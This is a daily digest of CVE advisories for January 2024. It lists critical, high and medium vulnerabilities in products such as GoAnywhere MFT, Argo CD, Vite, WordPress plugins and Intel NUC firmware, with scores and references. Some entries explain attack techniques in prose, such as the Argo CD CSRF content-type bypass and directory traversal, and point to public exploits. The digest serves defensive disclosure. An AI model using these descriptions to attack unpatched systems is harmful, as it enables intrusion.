Latest vulnerabilities [Monday, January 22, 2024 + weekend]

Last update performed on 01/22/2024 at 11:57:07 PM

(4) CRITICAL VULNERABILITIES [9.0, 10.0]

Source : cert.org.tw

Vulnerability ID : CVE-2023-5716

First published on : 19-01-2024 04:15:09
Last modified on : 19-01-2024 15:56:26

Description :
ASUS Armoury Crate has an arbitrary file write vulnerability that allows remote attackers to access or modify arbitrary files by sending specific HTTP requests without permission.

CVE ID : CVE-2023-5716
Source : twcert@cert.org.tw
CVSS Score : 9.8

References :
https://www.twcert.org.tw/tw/cp-132-7666-fffce-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-610


Source : wordfence.com

Vulnerability ID : CVE-2024-0705

First published on : 19-01-2024 10:15:34
Last modified on : 19-01-2024 15:56:26

Description :
The Stripe Payment Plugin for WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 3.7.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVE ID : CVE-2024-0705
Source : security@wordfence.com
CVSS Score : 9.8

References :
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2954934%40payment-gateway-stripe-and-woocommerce-integration&new=2954934%40payment-gateway-stripe-and-woocommerce-integration&sfp_email=&sfph_mail= | source : security@wordfence.com
https://www.wordfence.com/threat-intel/vulnerabilities/id/2652a7fc-b610-40f1-8b76-2129f59390ec?source=cve | source : security@wordfence.com


Source : df4dee71-de3a-4139-9588-11b62fe6c0ff

Vulnerability ID : CVE-2024-0204

First published on : 22-01-2024 18:15:20
Last modified on : 22-01-2024 19:10:26

Description :
Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.

CVE ID : CVE-2024-0204
Source : df4dee71-de3a-4139-9588-11b62fe6c0ff
CVSS Score : 9.8

References :
https://my.goanywhere.com/webclient/ViewSecurityAdvisories.xhtml | source : df4dee71-de3a-4139-9588-11b62fe6c0ff
https://www.fortra.com/security/advisory/fi-2024-001 | source : df4dee71-de3a-4139-9588-11b62fe6c0ff

Vulnerability : CWE-425


Source : huntr.dev

Vulnerability ID : CVE-2024-0521

First published on : 20-01-2024 21:15:43
Last modified on : 22-01-2024 14:01:14

Description :
Code Injection in paddlepaddle/paddle

CVE ID : CVE-2024-0521
Source : security@huntr.dev
CVSS Score : 9.3

References :
https://huntr.com/bounties/a569c64b-1e2b-4bed-a19f-47fd5a3da453 | source : security@huntr.dev

Vulnerability : CWE-94


(26) HIGH VULNERABILITIES [7.0, 8.9]

Source : us.ibm.com

Vulnerability ID : CVE-2023-40683

First published on : 19-01-2024 01:15:08
Last modified on : 19-01-2024 01:51:14

Description :
IBM OpenPages with Watson 8.3 and 9.0 could allow a remote attacker to bypass security restrictions, caused by insufficient authorization checks. By authenticating as an OpenPages user and using non-public APIs, an attacker could exploit this vulnerability to bypass security and gain unauthorized administrative access to the application. IBM X-Force ID: 264005.

CVE ID : CVE-2023-40683
Source : psirt@us.ibm.com
CVSS Score : 8.8

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/264005 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7107774 | source : psirt@us.ibm.com

Vulnerability : CWE-264


Source : mitre.org

Vulnerability ID : CVE-2024-23768

First published on : 22-01-2024 03:15:08
Last modified on : 22-01-2024 14:01:09

Description :
Dremio before 24.3.1 allows path traversal. An authenticated user who has no privileges on certain folders (and the files and datasets in these folders) can access these folders, files, and datasets. To be successful, the user must have access to the source and at least one folder in the source. Affected versions are: 24.0.0 through 24.3.0, 23.0.0 through 23.2.3, and 22.0.0 through 22.2.2. Fixed versions are: 24.3.1 and later, 23.2.4 and later, and 22.2.3 and later.

CVE ID : CVE-2024-23768
Source : cve@mitre.org
CVSS Score : 8.8

References :
https://docs.dremio.com/current/reference/bulletins/2024-01-12-01 | source : cve@mitre.org


Source : dragos.com

Vulnerability ID : CVE-2022-45790

First published on : 22-01-2024 18:15:19
Last modified on : 22-01-2024 19:10:26

Description :
The Omron FINS protocol has an authenticated feature to prevent access to memory regions. Authentication is susceptible to bruteforce attack, which may allow an adversary to gain access to protected memory. This access can allow overwrite of values including programmed logic.

CVE ID : CVE-2022-45790
Source : ot-cert@dragos.com
CVSS Score : 8.6

References :
https://www.cisa.gov/news-events/ics-advisories/icsa-23-262-05 | source : ot-cert@dragos.com
https://www.dragos.com/advisory/omron-plc-and-engineering-software-network-and-file-format-access/ | source : ot-cert@dragos.com
https://www.fa.omron.co.jp/product/security/assets/pdf/en/OMSR-2023-010_en.pdf | source : ot-cert@dragos.com

Vulnerability : CWE-307


Vulnerability ID : CVE-2022-45792

First published on : 22-01-2024 18:15:19
Last modified on : 22-01-2024 19:10:26

Description :
Project files may contain malicious contents which the software will use to create files on the filesystem. This allows directory traversal and overwriting files with the privileges of the logged-in user.

CVE ID : CVE-2022-45792
Source : ot-cert@dragos.com
CVSS Score : 7.8

References :
https://www.dragos.com/advisory/omron-plc-and-engineering-software-network-and-file-format-access/ | source : ot-cert@dragos.com

Vulnerability : CWE-22


Source : github.com

Vulnerability ID : CVE-2024-22424

First published on : 19-01-2024 01:15:09
Last modified on : 19-01-2024 01:51:14

Description :
Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Argo CD API versions prior to 2.10-rc2, 2.9.4, 2.8.8, and 2.7.15 are vulnerable to a cross-site request forgery (CSRF) attack when the attacker has the ability to write HTML to a page on the same parent domain as Argo CD. A CSRF attack works by tricking an authenticated Argo CD user into loading a web page which contains code to call Argo CD API endpoints on the victim’s behalf. For example, an attacker could send an Argo CD user a link to a page which looks harmless but in the background calls an Argo CD API endpoint to create an application running malicious code. Argo CD uses the “Lax” SameSite cookie policy to prevent CSRF attacks where the attacker controls an external domain. The malicious external website can attempt to call the Argo CD API, but the web browser will refuse to send the Argo CD auth token with the request. Many companies host Argo CD on an internal subdomain. If an attacker can place malicious code on, for example, https://test.internal.example.com/, they can still perform a CSRF attack. In this case, the “Lax” SameSite cookie does not prevent the browser from sending the auth cookie, because the destination is a parent domain of the Argo CD API. Browsers generally block such attacks by applying CORS policies to sensitive requests with sensitive content types. Specifically, browsers will send a “preflight request” for POSTs with content type “application/json” asking the destination API “are you allowed to accept requests from my domain?” If the destination API does not answer “yes,” the browser will block the request. Before the patched versions, Argo CD did not validate that requests contained the correct content type header. So an attacker could bypass the browser’s CORS check by setting the content type to something which is considered “not sensitive” such as “text/plain.” The browser wouldn’t send the preflight request, and Argo CD would happily accept the contents (which are actually still JSON) and perform the requested action (such as running malicious code). A patch for this vulnerability has been released in the following Argo CD versions: 2.10-rc2, 2.9.4, 2.8.8, and 2.7.15. The patch contains a breaking API change. The Argo CD API will no longer accept non-GET requests which do not specify application/json as their Content-Type. The accepted content types list is configurable, and it is possible (but discouraged) to disable the content type check completely. Users are advised to upgrade. There are no known workarounds for this vulnerability.

CVE ID : CVE-2024-22424
Source : security-advisories@github.com
CVSS Score : 8.3

References :
https://github.com/argoproj/argo-cd/issues/2496 | source : security-advisories@github.com
https://github.com/argoproj/argo-cd/pull/16860 | source : security-advisories@github.com
https://github.com/argoproj/argo-cd/security/advisories/GHSA-92mw-q256-5vwg | source : security-advisories@github.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2024-22421

First published on : 19-01-2024 21:15:09
Last modified on : 19-01-2024 22:52:48

Description :
JupyterLab is an extensible environment for interactive and reproducible computing, based on the Jupyter Notebook and Architecture. Users of JupyterLab who click on a malicious link may get their `Authorization` and `XSRFToken` tokens exposed to a third party when running an older `jupyter-server` version. JupyterLab versions 4.1.0b2, 4.0.11, and 3.6.7 are patched. No workaround has been identified; however, users should make sure to upgrade `jupyter-server` to version 2.7.2 or newer, which includes a redirect vulnerability fix.

CVE ID : CVE-2024-22421
Source : security-advisories@github.com
CVSS Score : 7.6

References :
https://github.com/jupyterlab/jupyterlab/commit/19bd9b96cb2e77170a67e43121637d0b5619e8c6 | source : security-advisories@github.com
https://github.com/jupyterlab/jupyterlab/security/advisories/GHSA-44cc-43rp-5947 | source : security-advisories@github.com

Vulnerability : CWE-200
Vulnerability : CWE-23


Vulnerability ID : CVE-2024-22422

First published on : 19-01-2024 01:15:09
Last modified on : 19-01-2024 01:51:14

Description :
AnythingLLM is an application that turns any document, resource, or piece of content into context that any LLM can use as references during chatting. In versions prior to commit `08d33cfd8` an unauthenticated API route (file export) can allow an attacker to crash the server, resulting in a denial of service attack. The “data-export” endpoint is used to export files using the filename parameter as user input. The endpoint takes the user input, filters it to avoid directory traversal attacks, fetches the file from the server, and afterwards deletes it. An attacker can trick the input filter mechanism to point to the current directory, and while attempting to delete it the server will crash as there is no error-handling wrapper around it. Moreover, the endpoint is public and does not require any form of authentication, resulting in an unauthenticated Denial of Service issue, which crashes the instance using a single HTTP packet. This issue has been addressed in commit `08d33cfd8`. Users are advised to upgrade. There are no known workarounds for this vulnerability.

CVE ID : CVE-2024-22422
Source : security-advisories@github.com
CVSS Score : 7.5

References :
https://github.com/Mintplex-Labs/anything-llm/commit/08d33cfd8fc47c5052b6ea29597c964a9da641e2 | source : security-advisories@github.com
https://github.com/Mintplex-Labs/anything-llm/security/advisories/GHSA-xmj6-g32r-fc5q | source : security-advisories@github.com

Vulnerability : CWE-754


Vulnerability ID : CVE-2024-23331

First published on : 19-01-2024 20:15:14
Last modified on : 19-01-2024 22:52:48

Description :
Vite is a frontend tooling framework for JavaScript. The Vite dev server option `server.fs.deny` can be bypassed on case-insensitive file systems using case-augmented versions of filenames. Notably this affects servers hosted on Windows. This bypass is similar to CVE-2023-34092, with surface area reduced to hosts having case-insensitive filesystems. Since `picomatch` defaults to case-sensitive glob matching but the file server doesn't discriminate, a blacklist bypass is possible. By requesting raw filesystem paths using augmented casing, the matcher derived from `config.server.fs.deny` fails to block access to sensitive files. This issue has been addressed in vite@5.0.12, vite@4.5.2, vite@3.2.8, and vite@2.9.17. Users are advised to upgrade. Users unable to upgrade should restrict access to dev servers.

CVE ID : CVE-2024-23331
Source : security-advisories@github.com
CVSS Score : 7.5

References :
https://github.com/vitejs/vite/commit/91641c4da0a011d4c5352e88fc68389d4e1289a5 | source : security-advisories@github.com
https://github.com/vitejs/vite/security/advisories/GHSA-c24v-8rfc-w8vw | source : security-advisories@github.com
https://vitejs.dev/config/server-options.html#server-fs-deny | source : security-advisories@github.com

Vulnerability : CWE-178
Vulnerability : CWE-200
Vulnerability : CWE-284


Source : patchstack.com

Vulnerability ID : CVE-2022-40700

First published on : 19-01-2024 15:15:08
Last modified on : 19-01-2024 15:56:19

Description :
Server-Side Request Forgery (SSRF) vulnerability in Montonio Montonio for WooCommerce, Wpopal Wpopal Core Features, AMO for WP – Membership Management ArcStone wp-amo, Long Watch Studio WooVirtualWallet – A virtual wallet for WooCommerce, Long Watch Studio WooVIP – Membership plugin for WordPress and WooCommerce, Long Watch Studio WooSupply – Suppliers, Supply Orders and Stock Management, Squidesma Theme Minifier, Paul Clark Styles styles, Designmodo Inc. WordPress Page Builder – Qards, Philip M. Hofer (Frumph) PHPFreeChat, Arun Basil Lal Custom Login Admin Front-end CSS, Team Agence-Press CSS Adder By Agence-Press, Unihost Confirm Data, deano1987 AMP Toolbox amp-toolbox, Arun Basil Lal Admin CSS MU. This issue affects Montonio for WooCommerce: from n/a through 6.0.1; Wpopal Core Features: from n/a through 1.5.8; ArcStone: from n/a through 4.6.6; WooVirtualWallet – A virtual wallet for WooCommerce: from n/a through 2.2.1; WooVIP – Membership plugin for WordPress and WooCommerce: from n/a through 1.4.4; WooSupply – Suppliers, Supply Orders and Stock Management: from n/a through 1.2.2; Theme Minifier: from n/a through 2.0; Styles: from n/a through 1.2.3; WordPress Page Builder – Qards: from n/a through 1.0.5; PHPFreeChat: from n/a through 0.2.8; Custom Login Admin Front-end CSS: from n/a through 1.4.1; CSS Adder By Agence-Press: from n/a through 1.5.0; Confirm Data: from n/a through 1.0.7; AMP Toolbox: from n/a through 2.1.1; Admin CSS MU: from n/a through 2.6.

CVE ID : CVE-2022-40700
Source : audit@patchstack.com
CVSS Score : 8.2

References :
https://patchstack.com/database/vulnerability/admin-css-mu/wordpress-admin-css-mu-plugin-2-6-server-side-request-forgery-ssrf-vulnerability?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/amp-toolbox/wordpress-amp-toolbox-plugin-2-1-1-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/confirm-data/wordpress-confirm-data-plugin-1-0-7-unauth-server-side-request-forgery-ssrf-vulnerability?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/css-adder-by-agence-press/wordpress-css-adder-by-agene-press-plugin-1-5-0-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/custom-login-admin-front-end-css-with-multisite-support/wordpress-custom-login-admin-front-end-css-plugin-1-4-1-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/montonio-for-woocommerce/wordpress-montonio-for-woocommerce-plugin-6-0-1-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/phpfreechat/wordpress-phpfreechat-plugin-0-2-8-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/qards-free/wordpress-wordpress-page-builder-qards-plugin-1-0-5-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/styles/wordpress-styles-plugin-1-2-3-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/theme-minifier/wordpress-theme-minifier-plugin-2-0-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/woosupply/wordpress-woosupply-plugin-1-2-2-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/woovip/wordpress-woovip-plugin-1-4-4-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/woovirtualwallet/wordpress-woovirtualwallet-plugin-2-2-1-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/wp-amo/wordpress-amo-for-wp-plugin-4-6-6-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/wpopal-core-features/wordpress-wpopal-core-features-plugin-1-5-7-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-918


Source : vuldb.com

Vulnerability ID : CVE-2024-0778

First published on : 22-01-2024 16:15:08
Last modified on : 22-01-2024 19:10:26

Description :
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, has been found in Uniview ISC 2500-S up to 20210930. Affected by this issue is the function setNatConfig of the file /Interface/DevManage/VM.php. The manipulation of the argument natAddress/natPort/natServerPort leads to os command injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251696. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.

CVE ID : CVE-2024-0778
Source : cna@vuldb.com
CVSS Score : 8.0

References :
https://github.com/dezhoutorizhao/cve/blob/main/rce.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.251696 | source : cna@vuldb.com
https://vuldb.com/?id.251696 | source : cna@vuldb.com

Vulnerability : CWE-78


Vulnerability ID : CVE-2024-0712

First published on : 19-01-2024 14:15:12
Last modified on : 19-01-2024 15:56:19

Description :
A vulnerability was found in Beijing Baichuo Smart S150 Management Platform V31R02B15. It has been classified as critical. Affected is an unknown function of the file /useratte/inc/userattea.php. The manipulation leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-251538 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE ID : CVE-2024-0712
Source : cna@vuldb.com
CVSS Score : 7.3

References :
https://github.com/GTA12138/vul/blob/main/smart%20s150/2024-1-9%20smart%20s150%20101508.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.251538 | source : cna@vuldb.com
https://vuldb.com/?id.251538 | source : cna@vuldb.com

Vulnerability : CWE-284


Vulnerability ID : CVE-2024-0739

First published on : 19-01-2024 22:15:08
Last modified on : 19-01-2024 22:52:48

Description :
A vulnerability, which was classified as critical, was found in Hecheng Leadshop up to 1.4.20. Affected is an unknown function of the file /web/leadshop.php. The manipulation of the argument install leads to deserialization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-251562 is the identifier assigned to this vulnerability.

CVE ID : CVE-2024-0739
Source : cna@vuldb.com
CVSS Score : 7.3

References :
https://note.zhaoj.in/share/vLswXhWxUrs8 | source : cna@vuldb.com
https://vuldb.com/?ctiid.251562 | source : cna@vuldb.com
https://vuldb.com/?id.251562 | source : cna@vuldb.com

Vulnerability : CWE-502


Source : intel.com

Vulnerability ID : CVE-2023-32272

First published on : 19-01-2024 20:15:10
Last modified on : 19-01-2024 22:52:48

Description :
Uncontrolled search path in some Intel NUC Pro Software Suite Configuration Tool software installers before version 3.0.0.6 may allow an authenticated user to potentially enable denial of service via local access.

CVE ID : CVE-2023-32272
Source : secure@intel.com
CVSS Score : 7.9

References :
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00964.html | source : secure@intel.com

Vulnerability : CWE-427


Vulnerability ID : CVE-2023-28738

First published on : 19-01-2024 20:15:09
Last modified on : 19-01-2024 22:52:48

Description :
Improper input validation for some Intel NUC BIOS firmware before version JY0070 may allow a privileged user to potentially enable escalation of privilege via local access.

CVE ID : CVE-2023-28738
Source : secure@intel.com
CVSS Score : 7.5

References :
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01009.html | source : secure@intel.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2023-28743

First published on : 19-01-2024 20:15:09
Last modified on : 19-01-2024 22:52:48

Description :
Improper input validation for some Intel NUC BIOS firmware before version QN0073 may allow a privileged user to potentially enable escalation of privilege via local access.

CVE ID : CVE-2023-28743
Source : secure@intel.com
CVSS Score : 7.5

References :
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01009.html | source : secure@intel.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2023-29495

First published on : 19-01-2024 20:15:09
Last modified on : 19-01-2024 22:52:48

Description :
Improper input validation for some Intel NUC BIOS firmware before version IN0048 may allow a privileged user to potentially enable escalation of privilege via local access.

CVE ID : CVE-2023-29495
Source : secure@intel.com
CVSS Score : 7.5

References :
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01009.html | source : secure@intel.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2023-38587

First published on : 19-01-2024 20:15:10
Last modified on : 19-01-2024 22:52:48

Description :
Improper input validation in some Intel NUC BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access.

CVE ID : CVE-2023-38587
Source : secure@intel.com
CVSS Score : 7.5

References :
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01028.html | source : secure@intel.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2023-42429

First published on : 19-01-2024 20:15:11
Last modified on : 19-01-2024 22:52:48

Description :
Improper buffer restrictions in some Intel NUC BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access.

CVE ID : CVE-2023-42429
Source : secure@intel.com
CVSS Score : 7.5

References :
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01028.html | source : secure@intel.com

Vulnerability : CWE-92


Vulnerability ID : CVE-2023-42766

First published on : 19-01-2024 20:15:11
Last modified on : 19-01-2024 22:52:48

Description :
Improper input validation in some Intel NUC 8 Compute Element BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access.

CVE ID : CVE-2023-42766
Source : secure@intel.com
CVSS Score : 7.5

References :
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01028.html | source : secure@intel.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2023-32544

First published on : 19-01-2024 20:15:10
Last modified on : 19-01-2024 22:52:48

Description :
Improper access control in some Intel HotKey Services for Windows 10 for Intel NUC P14E Laptop Element software installers before version 1.1.45 may allow an authenticated user to potentially enable denial of service via local access.

CVE ID : CVE-2023-32544
Source : secure@intel.com
CVSS Score : 7.3

References :
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00964.html | source : secure@intel.com

Vulnerability : CWE-284


Source : lenovo.com

Vulnerability ID : CVE-2023-6043

First published on : 19-01-2024 20:15:12
Last modified on : 19-01-2024 22:52:48

Description :
A privilege escalation vulnerability was reported in Lenovo Vantage that could allow a local attacker to bypass integrity checks and execute arbitrary code with elevated privileges.

CVE ID : CVE-2023-6043
Source : psirt@lenovo.com
CVSS Score : 7.8

References :
https://support.lenovo.com/us/en/product_security/LEN-144736 | source : psirt@lenovo.com

Vulnerability : CWE-295


Source : snyk.io

Vulnerability ID : CVE-2024-21484

First published on : 22-01-2024 05:15:08
Last modified on : 22-01-2024 14:01:09

Description :
Versions of the package jsrsasign before 11.0.0 are vulnerable to Observable Discrepancy via the RSA PKCS1.5 or RSAOAEP decryption process. An attacker can decrypt ciphertexts by exploiting this vulnerability. Exploiting this vulnerability requires the attacker to have access to a large number of ciphertexts encrypted with the same key. Workaround: This vulnerability can be mitigated by finding and replacing RSA and RSAOAEP decryption with another crypto library.

CVE ID : CVE-2024-21484
Source : report@snyk.io
CVSS Score : 7.5

References :
https://github.com/kjur/jsrsasign/issues/598 | source : report@snyk.io
https://github.com/kjur/jsrsasign/releases/tag/11.0.0 | source : report@snyk.io
https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-6070734 | source : report@snyk.io
https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBKJUR-6070733 | source : report@snyk.io
https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-6070732 | source : report@snyk.io
https://security.snyk.io/vuln/SNYK-JS-JSRSASIGN-6070731 | source : report@snyk.io

Vulnerability : CWE-203


Source : vmware.com

Vulnerability ID : CVE-2024-22233

First published on : 22-01-2024 13:15:25
Last modified on : 22-01-2024 14:01:09

Description :
In Spring Framework versions 6.0.15 and 6.1.2, it is possible for a user to provide specially crafted HTTP requests that may cause a denial-of-service (DoS) condition. Specifically, an application is vulnerable when all of the following are true:
* the application uses Spring MVC
* Spring Security 6.1.6+ or 6.2.1+ is on the classpath
Typically, Spring Boot applications need the org.springframework.boot:spring-boot-starter-web and org.springframework.boot:spring-boot-starter-security dependencies to meet all conditions.

CVE ID : CVE-2024-22233
Source : security@vmware.com
CVSS Score : 7.5

References :
https://spring.io/security/cve-2024-22233/ | source : security@vmware.com


Source : splunk.com

Vulnerability ID : CVE-2024-23678

First published on : 22-01-2024 21:15:10
Last modified on : 22-01-2024 21:15:10

Description :
In Splunk Enterprise for Windows versions below 9.0.8 and 9.1.3, Splunk Enterprise does not correctly sanitize path input data. This results in the unsafe deserialization of untrusted data from a separate disk partition on the machine. This vulnerability only affects Splunk Enterprise for Windows.

CVE ID : CVE-2024-23678
Source : prodsec@splunk.com
CVSS Score : 7.5

References :
https://advisory.splunk.com/advisories/SVD-2024-0108 | source : prodsec@splunk.com

Vulnerability : CWE-20


Source : wordfence.com

Vulnerability ID : CVE-2023-7063

First published on : 20-01-2024 09:15:07
Last modified on : 22-01-2024 14:01:14

Description :
The WPForms Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via form submission parameters in all versions up to, and including, 1.8.5.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVE ID : CVE-2023-7063
Source : security@wordfence.com
CVSS Score : 7.2

References :
https://wpforms.com/docs/how-to-view-recent-changes-to-the-wpforms-plugin-changelog/#1-8-5-4-2023-12-27 | source : security@wordfence.com
https://www.wordfence.com/threat-intel/vulnerabilities/id/31c080b8-ba00-4e96-8961-2a1c3a017004?source=cve | source : security@wordfence.com


Source : redhat.com

Vulnerability ID : CVE-2023-6531

First published on : 21-01-2024 10:15:07
Last modified on : 22-01-2024 14:01:14

Description :
A use-after-free flaw was found in the Linux Kernel due to a race problem in the unix garbage collector's deletion of SKB races with unix_stream_read_generic() on the socket that the SKB is queued on.

CVE ID : CVE-2023-6531
Source : secalert@redhat.com
CVSS Score : 7.0

References :
https://access.redhat.com/security/cve/CVE-2023-6531 | source : secalert@redhat.com
https://bugzilla.redhat.com/show_bug.cgi?id=2253034 | source : secalert@redhat.com
https://lore.kernel.org/all/c716c88321939156909cfa1bd8b0faaf1c804103.1701868795.git.asml.silence@gmail.com/ | source : secalert@redhat.com

Vulnerability : CWE-362


(56) MEDIUM VULNERABILITIES [4.0, 6.9]

Source : us.ibm.com

Vulnerability ID : CVE-2023-38738

First published on : 19-01-2024 01:15:08
Last modified on : 19-01-2024 01:51:14

Description :
IBM OpenPages with Watson 8.3 and 9.0 could provide weaker than expected security in an OpenPages environment using Native authentication. If OpenPages is using Native authentication, an attacker with access to the OpenPages database could, through a series of specially crafted steps, exploit this weakness and gain unauthorized access to other OpenPages accounts. IBM X-Force ID: 262594.

CVE ID : CVE-2023-38738
Source : psirt@us.ibm.com
CVSS Score : 6.8

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/262594 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7107775 | source : psirt@us.ibm.com

Vulnerability : CWE-257


Vulnerability ID : CVE-2023-50963

First published on : 19-01-2024 02:15:07
Last modified on : 19-01-2024 15:56:26

Description :
IBM Storage Defender - Data Protect 1.0.0 through 1.4.1 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 276101.

CVE ID : CVE-2023-50963
Source : psirt@us.ibm.com
CVSS Score : 6.5

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/276101 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7106918 | source : psirt@us.ibm.com

Vulnerability : CWE-601


Vulnerability ID : CVE-2023-50308

First published on : 22-01-2024 19:15:09
Last modified on : 22-01-2024 20:28:17

Description :
IBM Db2 for Linux, UNIX and Windows (includes DB2 Connect Server) 11.5 under certain circumstances could allow an authenticated user to the database to cause a denial of service when a statement is run on columnar tables. IBM X-Force ID: 273393.

CVE ID : CVE-2023-50308
Source : psirt@us.ibm.com
CVSS Score : 6.5

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/273393 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7105506 | source : psirt@us.ibm.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2023-27859

First published on : 22-01-2024 20:15:46
Last modified on : 22-01-2024 20:28:17

Description :
IBM Db2 10.1, 10.5, and 11.1 could allow a remote user to execute arbitrary code caused by installing like named jar files across multiple databases. A user could exploit this by installing a malicious jar file that overwrites the existing like named jar file in another database. IBM X-Force ID: 249205.

CVE ID : CVE-2023-27859
Source : psirt@us.ibm.com
CVSS Score : 6.5

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/249205 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7105503 | source : psirt@us.ibm.com


Vulnerability ID : CVE-2023-45193

First published on : 22-01-2024 19:15:08
Last modified on : 22-01-2024 20:28:17

Description :
IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.5 federated server is vulnerable to a denial of service when a specially crafted cursor is used. IBM X-Force ID: 268759.

CVE ID : CVE-2023-45193
Source : psirt@us.ibm.com
CVSS Score : 5.9

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/268759 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7105501 | source : psirt@us.ibm.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2023-47152

First published on : 22-01-2024 20:15:46
Last modified on : 22-01-2024 20:28:17

Description :
IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.5 is vulnerable to an insecure cryptographic algorithm and to information disclosure in stack trace under exceptional conditions. IBM X-Force ID: 270730.

CVE ID : CVE-2023-47152
Source : psirt@us.ibm.com
CVSS Score : 5.9

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/270730 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7105605 | source : psirt@us.ibm.com


Vulnerability ID : CVE-2023-35020

First published on : 19-01-2024 01:15:08
Last modified on : 19-01-2024 01:51:14

Description :
IBM Sterling Control Center 6.3.0 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 257874.

CVE ID : CVE-2023-35020
Source : psirt@us.ibm.com
CVSS Score : 5.4

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/257874 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7107788 | source : psirt@us.ibm.com

Vulnerability : CWE-22


Vulnerability ID : CVE-2023-32337

First published on : 19-01-2024 02:15:07
Last modified on : 19-01-2024 15:56:26

Description :
IBM Maximo Spatial Asset Management 8.10 is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. IBM X-Force ID: 255288.

CVE ID : CVE-2023-32337
Source : psirt@us.ibm.com
CVSS Score : 5.4

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/255288 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7107712 | source : psirt@us.ibm.com

